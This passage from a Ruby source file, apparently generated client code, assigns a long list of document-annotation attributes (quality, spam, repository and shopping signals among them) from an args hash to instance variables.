args[:ocean_metadata_parsed_su_doc] if args.key?(:ocean_metadata_parsed_su_doc)\n @ocean_metadata_patent_publication_details = args[:ocean_metadata_patent_publication_details] if args.key?(:ocean_metadata_patent_publication_details)\n @ocean_metadata_physical_measurements_component = args[:ocean_metadata_physical_measurements_component] if args.key?(:ocean_metadata_physical_measurements_component)\n @ocean_metadata_public_domain_info = args[:ocean_metadata_public_domain_info] if args.key?(:ocean_metadata_public_domain_info)\n @ocean_metadata_publication_details_component = args[:ocean_metadata_publication_details_component] if args.key?(:ocean_metadata_publication_details_component)\n @ocean_metadata_rights_component = args[:ocean_metadata_rights_component] if args.key?(:ocean_metadata_rights_component)\n @ocean_metadata_series_info_component = args[:ocean_metadata_series_info_component] if args.key?(:ocean_metadata_series_info_component)\n @ocean_metadata_tome_details_component = args[:ocean_metadata_tome_details_component] if args.key?(:ocean_metadata_tome_details_component)\n @ocean_metadata_tome_members_component = args[:ocean_metadata_tome_members_component] if args.key?(:ocean_metadata_tome_members_component)\n @ocean_metadata_tome_price_info = args[:ocean_metadata_tome_price_info] if args.key?(:ocean_metadata_tome_price_info)\n @ocean_reviews_for_work = args[:ocean_reviews_for_work] if args.key?(:ocean_reviews_for_work)\n @ocean_rights_opt_out_request = args[:ocean_rights_opt_out_request] if args.key?(:ocean_rights_opt_out_request)\n @official_pages_query_set = args[:official_pages_query_set] if args.key?(:official_pages_query_set)\n @per_doc_langid_data = args[:per_doc_langid_data] if args.key?(:per_doc_langid_data)\n @personalization_game_webevents_consolidated_events = args[:personalization_game_webevents_consolidated_events] if args.key?(:personalization_game_webevents_consolidated_events)\n @personalization_game_webevents_event = args[:personalization_game_webevents_event] if args.key?(:personalization_game_webevents_event)\n @personalization_game_webevents_events = args[:personalization_game_webevents_events] if args.key?(:personalization_game_webevents_events)\n @photos_geo_annotation = args[:photos_geo_annotation] if args.key?(:photos_geo_annotation)\n @predicted_authenticity = args[:predicted_authenticity] if args.key?(:predicted_authenticity)\n @price_annotations = args[:price_annotations] if args.key?(:price_annotations)\n @quality_anchors_outdegree_outdegree_info = args[:quality_anchors_outdegree_outdegree_info] if args.key?(:quality_anchors_outdegree_outdegree_info)\n @quality_anima_liveweb_liveweb_attachment = args[:quality_anima_liveweb_liveweb_attachment] if args.key?(:quality_anima_liveweb_liveweb_attachment)\n @quality_anima_routines_routines_properties_proto = args[:quality_anima_routines_routines_properties_proto] if args.key?(:quality_anima_routines_routines_properties_proto)\n @quality_authority_topic_embeddings = args[:quality_authority_topic_embeddings] if args.key?(:quality_authority_topic_embeddings)\n @quality_authorship_author_annotations = args[:quality_authorship_author_annotations] if args.key?(:quality_authorship_author_annotations)\n @quality_breadcrumbs_breadcrumb_annotations = args[:quality_breadcrumbs_breadcrumb_annotations] if args.key?(:quality_breadcrumbs_breadcrumb_annotations)\n @quality_calypso_apps_link = args[:quality_calypso_apps_link] if args.key?(:quality_calypso_apps_link)\n @quality_chard_document = args[:quality_chard_document] if args.key?(:quality_chard_document)\n @quality_chard_predicted_query_fringe_score = args[:quality_chard_predicted_query_fringe_score] if args.key?(:quality_chard_predicted_query_fringe_score)\n @quality_chard_predicted_xlq = args[:quality_chard_predicted_xlq] if args.key?(:quality_chard_predicted_xlq)\n @quality_contra_selected_attributions = args[:quality_contra_selected_attributions] if args.key?(:quality_contra_selected_attributions)\n @quality_copia_firefly_site_info = args[:quality_copia_firefly_site_info] if args.key?(:quality_copia_firefly_site_info)\n @quality_discover_ugc_scat_scat_embedding_annotation = args[:quality_discover_ugc_scat_scat_embedding_annotation] if args.key?(:quality_discover_ugc_scat_scat_embedding_annotation)\n @quality_dni_newsstand_pcu = args[:quality_dni_newsstand_pcu] if args.key?(:quality_dni_newsstand_pcu)\n @quality_dni_pcu_auxiliary_data = args[:quality_dni_pcu_auxiliary_data] if args.key?(:quality_dni_pcu_auxiliary_data)\n @quality_dni_pcu_meta_annotation = args[:quality_dni_pcu_meta_annotation] if args.key?(:quality_dni_pcu_meta_annotation)\n @quality_dni_pcu_parsed_data = args[:quality_dni_pcu_parsed_data] if args.key?(:quality_dni_pcu_parsed_data)\n @quality_dni_pcu_raw_data = args[:quality_dni_pcu_raw_data] if args.key?(:quality_dni_pcu_raw_data)\n @quality_explore_queryable_feed_ecs_annotation = args[:quality_explore_queryable_feed_ecs_annotation] if args.key?(:quality_explore_queryable_feed_ecs_annotation)\n @quality_explore_queryable_feed_hashtag_annotation = args[:quality_explore_queryable_feed_hashtag_annotation] if args.key?(:quality_explore_queryable_feed_hashtag_annotation)\n @quality_explore_queryable_feed_hashtag_list_annotation = args[:quality_explore_queryable_feed_hashtag_list_annotation] if args.key?(:quality_explore_queryable_feed_hashtag_list_annotation)\n @quality_explore_queryable_feed_topic_feed_scoring_signals = args[:quality_explore_queryable_feed_topic_feed_scoring_signals] if args.key?(:quality_explore_queryable_feed_topic_feed_scoring_signals)\n @quality_freshness_abacus_instant_negative_clicks_info = args[:quality_freshness_abacus_instant_negative_clicks_info] if args.key?(:quality_freshness_abacus_instant_negative_clicks_info)\n @quality_fringe_fringe_query_prior = args[:quality_fringe_fringe_query_prior] if args.key?(:quality_fringe_fringe_query_prior)\n @quality_geo_brainloc_goldmine_brainloc_annotation = args[:quality_geo_brainloc_goldmine_brainloc_annotation] if args.key?(:quality_geo_brainloc_goldmine_brainloc_annotation)\n @quality_geo_logloc_goldmine_document_location_annotation = args[:quality_geo_logloc_goldmine_document_location_annotation] if args.key?(:quality_geo_logloc_goldmine_document_location_annotation)\n @quality_historical_content_age = args[:quality_historical_content_age] if args.key?(:quality_historical_content_age)\n @quality_horizon_proto_horizon_embeddings = args[:quality_horizon_proto_horizon_embeddings] if args.key?(:quality_horizon_proto_horizon_embeddings)\n @quality_horizon_record_info_annotation = args[:quality_horizon_record_info_annotation] if args.key?(:quality_horizon_record_info_annotation)\n @quality_improv_doc_to_queries = args[:quality_improv_doc_to_queries] if args.key?(:quality_improv_doc_to_queries)\n @quality_improv_improv_anchors = args[:quality_improv_improv_anchors] if args.key?(:quality_improv_improv_anchors)\n @quality_lisztomania_document = args[:quality_lisztomania_document] if args.key?(:quality_lisztomania_document)\n @quality_navboost_craps_craps_data = args[:quality_navboost_craps_craps_data] if args.key?(:quality_navboost_craps_craps_data)\n @quality_navboost_craps_craps_pattern_signal = args[:quality_navboost_craps_craps_pattern_signal] if args.key?(:quality_navboost_craps_craps_pattern_signal)\n @quality_negative_clicks_negative_clicks_info = args[:quality_negative_clicks_negative_clicks_info] if args.key?(:quality_negative_clicks_negative_clicks_info)\n @quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations = args[:quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations] if args.key?(:quality_nlq_structured_search_annotation_analysis_automatic_extraction_annotations)\n @quality_nlq_structured_search_listing_pages_listing_page_annotations = args[:quality_nlq_structured_search_listing_pages_listing_page_annotations] if args.key?(:quality_nlq_structured_search_listing_pages_listing_page_annotations)\n @quality_nsr_doki_annotation = args[:quality_nsr_doki_annotation] if args.key?(:quality_nsr_doki_annotation)\n @quality_nsr_nsr_data = args[:quality_nsr_nsr_data] if args.key?(:quality_nsr_nsr_data)\n @quality_nsr_nsr_sitechunks_annotation = args[:quality_nsr_nsr_sitechunks_annotation] if args.key?(:quality_nsr_nsr_sitechunks_annotation)\n @quality_nsr_pairwiseq_pairwise_q_data = args[:quality_nsr_pairwiseq_pairwise_q_data] if args.key?(:quality_nsr_pairwiseq_pairwise_q_data)\n @quality_nsr_pq_data = args[:quality_nsr_pq_data] if args.key?(:quality_nsr_pq_data)\n @quality_nsr_site_authority = args[:quality_nsr_site_authority] if args.key?(:quality_nsr_site_authority)\n @quality_nsr_uv_sitechunks_annotation = args[:quality_nsr_uv_sitechunks_annotation] if args.key?(:quality_nsr_uv_sitechunks_annotation)\n @quality_orbit_asteroid_belt_intermediate_document_intent_scores = args[:quality_orbit_asteroid_belt_intermediate_document_intent_scores] if args.key?(:quality_orbit_asteroid_belt_intermediate_document_intent_scores)\n @quality_pagemaster_pagemaster_annotations = args[:quality_pagemaster_pagemaster_annotations] if args.key?(:quality_pagemaster_pagemaster_annotations)\n @quality_panoptic_indexing_discover_corpus_annotation = args[:quality_panoptic_indexing_discover_corpus_annotation] if args.key?(:quality_panoptic_indexing_discover_corpus_annotation)\n @quality_panoptic_indexing_discover_document_signal = args[:quality_panoptic_indexing_discover_document_signal] if args.key?(:quality_panoptic_indexing_discover_document_signal)\n @quality_panoptic_indexing_panoptic_annotation = args[:quality_panoptic_indexing_panoptic_annotation] if args.key?(:quality_panoptic_indexing_panoptic_annotation)\n @quality_panoptic_storytime_annotation = args[:quality_panoptic_storytime_annotation] if args.key?(:quality_panoptic_storytime_annotation)\n @quality_panoptic_storytime_scoring_signals = args[:quality_panoptic_storytime_scoring_signals] if args.key?(:quality_panoptic_storytime_scoring_signals)\n @quality_panoptic_voice_ugc_annotation = args[:quality_panoptic_voice_ugc_annotation] if args.key?(:quality_panoptic_voice_ugc_annotation)\n @quality_peoplesearch_namedetector_name_occurrence_annotations = args[:quality_peoplesearch_namedetector_name_occurrence_annotations] if args.key?(:quality_peoplesearch_namedetector_name_occurrence_annotations)\n @quality_popfeeds_chrome_background_annotation = args[:quality_popfeeds_chrome_background_annotation] if args.key?(:quality_popfeeds_chrome_background_annotation)\n @quality_popfeeds_hub_data_annotations = args[:quality_popfeeds_hub_data_annotations] if args.key?(:quality_popfeeds_hub_data_annotations)\n @quality_popfeeds_url_prediction_annotations = args[:quality_popfeeds_url_prediction_annotations] if args.key?(:quality_popfeeds_url_prediction_annotations)\n @quality_popfeeds_url_source_annotations = args[:quality_popfeeds_url_source_annotations] if args.key?(:quality_popfeeds_url_source_annotations)\n @quality_pricedetector_kefir_price_annotations = args[:quality_pricedetector_kefir_price_annotations] if args.key?(:quality_pricedetector_kefir_price_annotations)\n @quality_pricedetector_product_block_annotations = args[:quality_pricedetector_product_block_annotations] if args.key?(:quality_pricedetector_product_block_annotations)\n @quality_prose_json_ld_annotation = args[:quality_prose_json_ld_annotation] if args.key?(:quality_prose_json_ld_annotation)\n @quality_prose_thumbnail_selection = args[:quality_prose_thumbnail_selection] if args.key?(:quality_prose_thumbnail_selection)\n @quality_q2_quality_boost = args[:quality_q2_quality_boost] if args.key?(:quality_q2_quality_boost)\n @quality_q2_site_quality_features = args[:quality_q2_site_quality_features] if args.key?(:quality_q2_site_quality_features)\n @quality_realtime_boost_realtime_boost_event = args[:quality_realtime_boost_realtime_boost_event] if args.key?(:quality_realtime_boost_realtime_boost_event)\n @quality_realtime_boost_realtime_boost_response = args[:quality_realtime_boost_realtime_boost_response] if args.key?(:quality_realtime_boost_realtime_boost_response)\n @quality_realtime_boost_seismograph_event_annotations = args[:quality_realtime_boost_seismograph_event_annotations] if args.key?(:quality_realtime_boost_seismograph_event_annotations)\n @quality_realtime_realtime_result_info = args[:quality_realtime_realtime_result_info] if args.key?(:quality_realtime_realtime_result_info)\n @quality_realtime_rt_fact_annotations = args[:quality_realtime_rt_fact_annotations] if args.key?(:quality_realtime_rt_fact_annotations)\n @quality_result_filtering_indexing_cluster_annotations = args[:quality_result_filtering_indexing_cluster_annotations] if args.key?(:quality_result_filtering_indexing_cluster_annotations)\n @quality_richsnippets_apps_protos_application_information_attachment = args[:quality_richsnippets_apps_protos_application_information_attachment] if args.key?(:quality_richsnippets_apps_protos_application_information_attachment)\n @quality_rodin_rodin_site_signal = args[:quality_rodin_rodin_site_signal] if args.key?(:quality_rodin_rodin_site_signal)\n @quality_salient_countries_salient_country_set = args[:quality_salient_countries_salient_country_set] if args.key?(:quality_salient_countries_salient_country_set)\n @quality_salient_structures_salient_structure_set = args[:quality_salient_structures_salient_structure_set] if args.key?(:quality_salient_structures_salient_structure_set)\n @quality_salient_stuff_salient_stuff_set = args[:quality_salient_stuff_salient_stuff_set] if args.key?(:quality_salient_stuff_salient_stuff_set)\n @quality_salient_terms_query_smearing_model = args[:quality_salient_terms_query_smearing_model] if args.key?(:quality_salient_terms_query_smearing_model)\n @quality_salient_terms_salient_term_set = args[:quality_salient_terms_salient_term_set] if args.key?(:quality_salient_terms_salient_term_set)\n @quality_searchoversite_annotator_structured_results_annotation = args[:quality_searchoversite_annotator_structured_results_annotation] if args.key?(:quality_searchoversite_annotator_structured_results_annotation)\n @quality_sherlock_knex_annotation = args[:quality_sherlock_knex_annotation] if args.key?(:quality_sherlock_knex_annotation)\n @quality_shopping_product_review = args[:quality_shopping_product_review] if args.key?(:quality_shopping_product_review)\n @quality_shopping_product_review_page = args[:quality_shopping_product_review_page] if args.key?(:quality_shopping_product_review_page)\n @quality_shopping_shopping_product_review_annotation = args[:quality_shopping_shopping_product_review_annotation] if args.key?(:quality_shopping_shopping_product_review_annotation)\n @quality_similarpages_related_info_signal = args[:quality_similarpages_related_info_signal] if args.key?(:quality_similarpages_related_info_signal)\n @quality_sitemap_document = args[:quality_sitemap_document] if args.key?(:quality_sitemap_document)\n @quality_sitemap_third_party_carousels_item_lists = args[:quality_sitemap_third_party_carousels_item_lists] if args.key?(:quality_sitemap_third_party_carousels_item_lists)\n @quality_sixface_sixface_url_data = args[:quality_sixface_sixface_url_data] if args.key?(:quality_sixface_sixface_url_data)\n @quality_snippets_hidden_text_hidden_span_annotations = args[:quality_snippets_hidden_text_hidden_span_annotations] if args.key?(:quality_snippets_hidden_text_hidden_span_annotations)\n @quality_snippets_list_snippets_annotations = args[:quality_snippets_list_snippets_annotations] if args.key?(:quality_snippets_list_snippets_annotations)\n @quality_snippets_metadescription_duplicate_meta_site_signal = args[:quality_snippets_metadescription_duplicate_meta_site_signal] if args.key?(:quality_snippets_metadescription_duplicate_meta_site_signal)\n @quality_snippets_snippet_spans_info = args[:quality_snippets_snippet_spans_info] if args.key?(:quality_snippets_snippet_spans_info)\n @quality_sos_goldmine_sos_annotation = args[:quality_sos_goldmine_sos_annotation] if args.key?(:quality_sos_goldmine_sos_annotation)\n @quality_summary_summary = args[:quality_summary_summary] if args.key?(:quality_summary_summary)\n @quality_tangram_information_types = args[:quality_tangram_information_types] if args.key?(:quality_tangram_information_types)\n @quality_timebased_time_sensitivity_time_sensitivity_annotation = args[:quality_timebased_time_sensitivity_time_sensitivity_annotation] if args.key?(:quality_timebased_time_sensitivity_time_sensitivity_annotation)\n @quality_titles_alternative_titles_info = args[:quality_titles_alternative_titles_info] if args.key?(:quality_titles_alternative_titles_info)\n @quality_titles_sitelinks_target_title_info = args[:quality_titles_sitelinks_target_title_info] if args.key?(:quality_titles_sitelinks_target_title_info)\n @quality_twiddler_domain_classification = args[:quality_twiddler_domain_classification] if args.key?(:quality_twiddler_domain_classification)\n @quality_views_answers_answer_annotation_info = args[:quality_views_answers_answer_annotation_info] if args.key?(:quality_views_answers_answer_annotation_info)\n @quality_visualweb_visual_web_annotation = args[:quality_visualweb_visual_web_annotation] if args.key?(:quality_visualweb_visual_web_annotation)\n @quality_visualweb_visual_web_models_annotation = args[:quality_visualweb_visual_web_models_annotation] if args.key?(:quality_visualweb_visual_web_models_annotation)\n @quality_webanswers_alt_title_saft_doc = args[:quality_webanswers_alt_title_saft_doc] if args.key?(:quality_webanswers_alt_title_saft_doc)\n @quality_webanswers_transcript_annotations = args[:quality_webanswers_transcript_annotations] if args.key?(:quality_webanswers_transcript_annotations)\n @quality_webfeeder_doc_embedding = args[:quality_webfeeder_doc_embedding] if args.key?(:quality_webfeeder_doc_embedding)\n @quality_webshine_doc_resources = args[:quality_webshine_doc_resources] if args.key?(:quality_webshine_doc_resources)\n @rank_boost_doc_attachment = args[:rank_boost_doc_attachment] if args.key?(:rank_boost_doc_attachment)\n @rankembed = args[:rankembed] if args.key?(:rankembed)\n @relative_date_annotations = args[:relative_date_annotations] if args.key?(:relative_date_annotations)\n @repository_annotations_address_annotations = args[:repository_annotations_address_annotations] if args.key?(:repository_annotations_address_annotations)\n @repository_annotations_amenities_amenities_annotations = args[:repository_annotations_amenities_amenities_annotations] if args.key?(:repository_annotations_amenities_amenities_annotations)\n @repository_annotations_crawzall_annotations = args[:repository_annotations_crawzall_annotations] if args.key?(:repository_annotations_crawzall_annotations)\n @repository_annotations_discussion_thread_discussion_view_proto = args[:repository_annotations_discussion_thread_discussion_view_proto] if args.key?(:repository_annotations_discussion_thread_discussion_view_proto)\n @repository_annotations_licensed_resources = args[:repository_annotations_licensed_resources] if args.key?(:repository_annotations_licensed_resources)\n @repository_annotations_list_filter_annotations = args[:repository_annotations_list_filter_annotations] if args.key?(:repository_annotations_list_filter_annotations)\n @repository_annotations_list_summary_annotations = args[:repository_annotations_list_summary_annotations] if args.key?(:repository_annotations_list_summary_annotations)\n @repository_annotations_microdata_microdata_annotations = args[:repository_annotations_microdata_microdata_annotations] if args.key?(:repository_annotations_microdata_microdata_annotations)\n @repository_annotations_microformats_hproduct = args[:repository_annotations_microformats_hproduct] if args.key?(:repository_annotations_microformats_hproduct)\n @repository_annotations_microformats_microformat_annotations = args[:repository_annotations_microformats_microformat_annotations] if args.key?(:repository_annotations_microformats_microformat_annotations)\n @repository_annotations_phone_type_phone_type_annotations = args[:repository_annotations_phone_type_phone_type_annotations] if args.key?(:repository_annotations_phone_type_phone_type_annotations)\n @repository_annotations_rdfa_rdfa_annotations = args[:repository_annotations_rdfa_rdfa_annotations] if args.key?(:repository_annotations_rdfa_rdfa_annotations)\n @repository_annotations_rodin_article_annotation = args[:repository_annotations_rodin_article_annotation] if args.key?(:repository_annotations_rodin_article_annotation)\n @repository_annotations_section_heading_annotations = args[:repository_annotations_section_heading_annotations] if args.key?(:repository_annotations_section_heading_annotations)\n @repository_annotations_snippet_segment_snippet_segment_annotations = args[:repository_annotations_snippet_segment_snippet_segment_annotations] if args.key?(:repository_annotations_snippet_segment_snippet_segment_annotations)\n @repository_annotations_spore_authority_signal = args[:repository_annotations_spore_authority_signal] if args.key?(:repository_annotations_spore_authority_signal)\n @repository_annotations_spore_deeplink_annotations = args[:repository_annotations_spore_deeplink_annotations] if args.key?(:repository_annotations_spore_deeplink_annotations)\n @repository_annotations_spore_extractor_topic_annotations = args[:repository_annotations_spore_extractor_topic_annotations] if args.key?(:repository_annotations_spore_extractor_topic_annotations)\n @repository_annotations_spore_extractor_triple_annotations = args[:repository_annotations_spore_extractor_triple_annotations] if args.key?(:repository_annotations_spore_extractor_triple_annotations)\n @repository_annotations_spore_spore_etl_annotation = args[:repository_annotations_spore_spore_etl_annotation] if args.key?(:repository_annotations_spore_spore_etl_annotation)\n @repository_annotations_spore_spore_etl_input_annotations = args[:repository_annotations_spore_spore_etl_input_annotations] if args.key?(:repository_annotations_spore_spore_etl_input_annotations)\n @repository_annotations_storehours_store_hours_annotations = args[:repository_annotations_storehours_store_hours_annotations] if args.key?(:repository_annotations_storehours_store_hours_annotations)\n @repository_annotations_verse_annotations = args[:repository_annotations_verse_annotations] if args.key?(:repository_annotations_verse_annotations)\n @repository_annotations_webanswers_context_item_annotations = args[:repository_annotations_webanswers_context_item_annotations] if args.key?(:repository_annotations_webanswers_context_item_annotations)\n @repository_protium_encyclojoins_encyclo_join = args[:repository_protium_encyclojoins_encyclo_join] if args.key?(:repository_protium_encyclojoins_encyclo_join)\n @repository_protium_goldmine_triplification_result = args[:repository_protium_goldmine_triplification_result] if args.key?(:repository_protium_goldmine_triplification_result)\n @repository_protium_goldmine_type_assertion_output = args[:repository_protium_goldmine_type_assertion_output] if args.key?(:repository_protium_goldmine_type_assertion_output)\n @repository_protium_webkv_web_kv = args[:repository_protium_webkv_web_kv] if args.key?(:repository_protium_webkv_web_kv)\n @repository_protium_wikia_wikia_info = args[:repository_protium_wikia_wikia_info] if args.key?(:repository_protium_wikia_wikia_info)\n @repository_updater_index_selection_attachment = args[:repository_updater_index_selection_attachment] if args.key?(:repository_updater_index_selection_attachment)\n @repository_webref_entity_join = args[:repository_webref_entity_join] if args.key?(:repository_webref_entity_join)\n @repository_webref_experimental_webref_entities_attachment = args[:repository_webref_experimental_webref_entities_attachment] if args.key?(:repository_webref_experimental_webref_entities_attachment)\n @repository_webref_graph_mention = args[:repository_webref_graph_mention] if args.key?(:repository_webref_graph_mention)\n @repository_webref_juggernaut_indices = args[:repository_webref_juggernaut_indices] if args.key?(:repository_webref_juggernaut_indices)\n @repository_webref_page_classification_anchor_signals_set = args[:repository_webref_page_classification_anchor_signals_set] if args.key?(:repository_webref_page_classification_anchor_signals_set)\n @repository_webref_page_classification_signals_set = args[:repository_webref_page_classification_signals_set] if args.key?(:repository_webref_page_classification_signals_set)\n @repository_webref_pianno_document_intents = args[:repository_webref_pianno_document_intents] if args.key?(:repository_webref_pianno_document_intents)\n @repository_webref_pianno_tv_season_episode = args[:repository_webref_pianno_tv_season_episode] if args.key?(:repository_webref_pianno_tv_season_episode)\n @repository_webref_preprocessing_reference_page_candidate_list = args[:repository_webref_preprocessing_reference_page_candidate_list] if args.key?(:repository_webref_preprocessing_reference_page_candidate_list)\n @repository_webref_reconcile_response = args[:repository_webref_reconcile_response] if args.key?(:repository_webref_reconcile_response)\n @repository_webref_refcon_juggler_reference_page_mappings = args[:repository_webref_refcon_juggler_reference_page_mappings] if args.key?(:repository_webref_refcon_juggler_reference_page_mappings)\n @repository_webref_reference_pages_classifier_scored_page = args[:repository_webref_reference_pages_classifier_scored_page] if args.key?(:repository_webref_reference_pages_classifier_scored_page)\n @repository_webref_salient_entity_set = args[:repository_webref_salient_entity_set] if args.key?(:repository_webref_salient_entity_set)\n @repository_webref_undermerged_entities = args[:repository_webref_undermerged_entities] if args.key?(:repository_webref_undermerged_entities)\n @repository_webref_universal_embedding_retrieval_debug = args[:repository_webref_universal_embedding_retrieval_debug] if args.key?(:repository_webref_universal_embedding_retrieval_debug)\n @repository_webref_webit_intermediary_mids = args[:repository_webref_webit_intermediary_mids] if args.key?(:repository_webref_webit_intermediary_mids)\n @repository_webref_webit_scope_fprint = args[:repository_webref_webit_scope_fprint] if args.key?(:repository_webref_webit_scope_fprint)\n @repository_webref_webit_scope_signals = args[:repository_webref_webit_scope_signals] if args.key?(:repository_webref_webit_scope_signals)\n @repository_webref_webit_triple_signals = args[:repository_webref_webit_triple_signals] if args.key?(:repository_webref_webit_triple_signals)\n @repository_webref_webref_entities = args[:repository_webref_webref_entities] if args.key?(:repository_webref_webref_entities)\n @repository_webref_webref_status = args[:repository_webref_webref_status] if args.key?(:repository_webref_webref_status)\n @repository_webtables_data_table_annotations = args[:repository_webtables_data_table_annotations] if args.key?(:repository_webtables_data_table_annotations)\n @repository_webtables_data_table_mid_annotation = args[:repository_webtables_data_table_mid_annotation] if args.key?(:repository_webtables_data_table_mid_annotation)\n @repository_webtables_translation_message = args[:repository_webtables_translation_message] if args.key?(:repository_webtables_translation_message)\n @repository_wikipedia_alias_list = args[:repository_wikipedia_alias_list] if args.key?(:repository_wikipedia_alias_list)\n @repository_wikipedia_annotator_wikipedia_page_component_annotations = args[:repository_wikipedia_annotator_wikipedia_page_component_annotations] if args.key?(:repository_wikipedia_annotator_wikipedia_page_component_annotations)\n @repository_wikipedia_sentence_compression_annotation = args[:repository_wikipedia_sentence_compression_annotation] if args.key?(:repository_wikipedia_sentence_compression_annotation)\n @repository_wikipedia_wiki_join = args[:repository_wikipedia_wiki_join] if args.key?(:repository_wikipedia_wiki_join)\n @repository_wikipedia_wiki_mapper_triple_set = args[:repository_wikipedia_wiki_mapper_triple_set] if args.key?(:repository_wikipedia_wiki_mapper_triple_set)\n @repository_wikipedia_wikibase_entity = args[:repository_wikipedia_wikibase_entity] if args.key?(:repository_wikipedia_wikibase_entity)\n @repository_wikipedia_wikidata_org_triple_set = args[:repository_wikipedia_wikidata_org_triple_set] if args.key?(:repository_wikipedia_wikidata_org_triple_set)\n @repository_wikipedia_wikitrust_wiki_trust_info = args[:repository_wikipedia_wikitrust_wiki_trust_info] if args.key?(:repository_wikipedia_wikitrust_wiki_trust_info)\n @research_coauthor_opinion_annotations = args[:research_coauthor_opinion_annotations] if args.key?(:research_coauthor_opinion_annotations)\n @research_structured_data_inadvertent_anchor_score_annotation = args[:research_structured_data_inadvertent_anchor_score_annotation] if args.key?(:research_structured_data_inadvertent_anchor_score_annotation)\n @research_structured_data_knowledge_exploration_annotations = args[:research_structured_data_knowledge_exploration_annotations] if args.key?(:research_structured_data_knowledge_exploration_annotations)\n @research_structured_data_news_embedding_annotations = args[:research_structured_data_news_embedding_annotations] if args.key?(:research_structured_data_news_embedding_annotations)\n @richsnippets_data_object = args[:richsnippets_data_object] if args.key?(:richsnippets_data_object)\n @richsnippets_feed_page_map = args[:richsnippets_feed_page_map] if args.key?(:richsnippets_feed_page_map)\n @richsnippets_page_map = args[:richsnippets_page_map] if args.key?(:richsnippets_page_map)\n @richsnippets_page_map_annotations = args[:richsnippets_page_map_annotations] if args.key?(:richsnippets_page_map_annotations)\n @richsnippets_schema_thing = args[:richsnippets_schema_thing] if args.key?(:richsnippets_schema_thing)\n @rosetta_language = args[:rosetta_language] if args.key?(:rosetta_language)\n @safesearch_page_classifier_output = args[:safesearch_page_classifier_output] if args.key?(:safesearch_page_classifier_output)\n @safesearch_safe_search_internal_page_signals = args[:safesearch_safe_search_internal_page_signals] if args.key?(:safesearch_safe_search_internal_page_signals)\n @science_index_signal = args[:science_index_signal] if args.key?(:science_index_signal)\n @search_engagement_highlight_shared_highlight_signal = args[:search_engagement_highlight_shared_highlight_signal] if args.key?(:search_engagement_highlight_shared_highlight_signal)\n @searchar_search_ar_pipeline_signal = args[:searchar_search_ar_pipeline_signal] if args.key?(:searchar_search_ar_pipeline_signal)\n @shopping_quality_shopping_site_classifier = args[:shopping_quality_shopping_site_classifier] if args.key?(:shopping_quality_shopping_site_classifier)\n @shopping_quality_shopping_site_classifier_shopfab = args[:shopping_quality_shopping_site_classifier_shopfab] if args.key?(:shopping_quality_shopping_site_classifier_shopfab)\n @shopping_webentity_shopping_annotation = args[:shopping_webentity_shopping_annotation] if args.key?(:shopping_webentity_shopping_annotation)\n @sitemaps_sitemaps_signals = args[:sitemaps_sitemaps_signals] if args.key?(:sitemaps_sitemaps_signals)\n @smearing_smeared_terms = args[:smearing_smeared_terms] if args.key?(:smearing_smeared_terms)\n @social_personalization_knex_annotation = args[:social_personalization_knex_annotation] if args.key?(:social_personalization_knex_annotation)\n @spam_brain_spam_brain_data = args[:spam_brain_spam_brain_data] if args.key?(:spam_brain_spam_brain_data)\n @spam_brain_spam_brain_page_classifier_annotation = args[:spam_brain_spam_brain_page_classifier_annotation] if args.key?(:spam_brain_spam_brain_page_classifier_annotation)\n @spam_content_anchor_dist = args[:spam_content_anchor_dist] if args.key?(:spam_content_anchor_dist)\n @spam_content_authentic_authentic_text_annotation = args[:spam_content_authentic_authentic_text_annotation] if args.key?(:spam_content_authentic_authentic_text_annotation)\n @spam_content_image_map_pb = args[:spam_content_image_map_pb] if args.key?(:spam_content_image_map_pb)\n @spam_content_site_age_stats = args[:spam_content_site_age_stats] if args.key?(:spam_content_site_age_stats)\n @spam_cookbook_cookbook_annotations = args[:spam_cookbook_cookbook_annotations] if args.key?(:spam_cookbook_cookbook_annotations)\n @spam_cookbook_cookbook_sitechunk_annotations = args[:spam_cookbook_cookbook_sitechunk_annotations] if args.key?(:spam_cookbook_cookbook_sitechunk_annotations)\n @spam_fatping_index_feed = args[:spam_fatping_index_feed] if args.key?(:spam_fatping_index_feed)\n @spam_godcluster_aff_id_annotation = args[:spam_godcluster_aff_id_annotation] if args.key?(:spam_godcluster_aff_id_annotation)\n @spam_godcluster_server_header_annotation = args[:spam_godcluster_server_header_annotation] if args.key?(:spam_godcluster_server_header_annotation)\n @spam_googlebombs_googlebombs_annotation = args[:spam_googlebombs_googlebombs_annotation] if args.key?(:spam_googlebombs_googlebombs_annotation)\n @spam_hacked_sites_doc_spam_info = args[:spam_hacked_sites_doc_spam_info] if args.key?(:spam_hacked_sites_doc_spam_info)\n @spam_hacked_sites_gpgb_gpgb_ngram_stats = args[:spam_hacked_sites_gpgb_gpgb_ngram_stats] if args.key?(:spam_hacked_sites_gpgb_gpgb_ngram_stats)\n @spam_hacked_sites_word_frequencies = args[:spam_hacked_sites_word_frequencies] if args.key?(:spam_hacked_sites_word_frequencies)\n @spam_js_js_info = args[:spam_js_js_info] if args.key?(:spam_js_js_info)\n @spam_scam_scamness = args[:spam_scam_scamness] if args.key?(:spam_scam_scamness)\n @spam_scam_unauthoritative_site = args[:spam_scam_unauthoritative_site] if args.key?(:spam_scam_unauthoritative_site)\n @spam_tokens_spam_tokens_annotation = args[:spam_tokens_spam_tokens_annotation] if args.key?(:spam_tokens_spam_tokens_annotation)\n @table_talk_stride_offer_page_price_annotation = args[:table_talk_stride_offer_page_price_annotation] if args.key?(:table_talk_stride_offer_page_price_annotation)\n @tasks_taba_taba_doc_signals = args[:tasks_taba_taba_doc_signals] if args.key?(:tasks_taba_taba_doc_signals)\n @telephone_number_annotations = args[:telephone_number_annotations] if args.key?(:telephone_number_annotations)\n @time_annotation_tags = args[:time_annotation_tags] if args.key?(:time_annotation_tags)\n @time_annotations = args[:time_annotations] if args.key?(:time_annotations)\n @time_range_annotations = args[:time_range_annotations] if args.key?(:time_range_annotations)\n @travel_assistant_travel_doc_classification = args[:travel_assistant_travel_doc_classification] if args.key?(:travel_assistant_travel_doc_classification)\n @ucp_signal = args[:ucp_signal] if args.key?(:ucp_signal)\n @udr_converter_document_shopping_data = args[:udr_converter_document_shopping_data] if args.key?(:udr_converter_document_shopping_data)\n @udr_converter_offer = args[:udr_converter_offer] if args.key?(:udr_converter_offer)\n @udr_converter_product_block_data = args[:udr_converter_product_block_data] if args.key?(:udr_converter_product_block_data)\n @udr_proto_detailed_entity_scores = args[:udr_proto_detailed_entity_scores] if 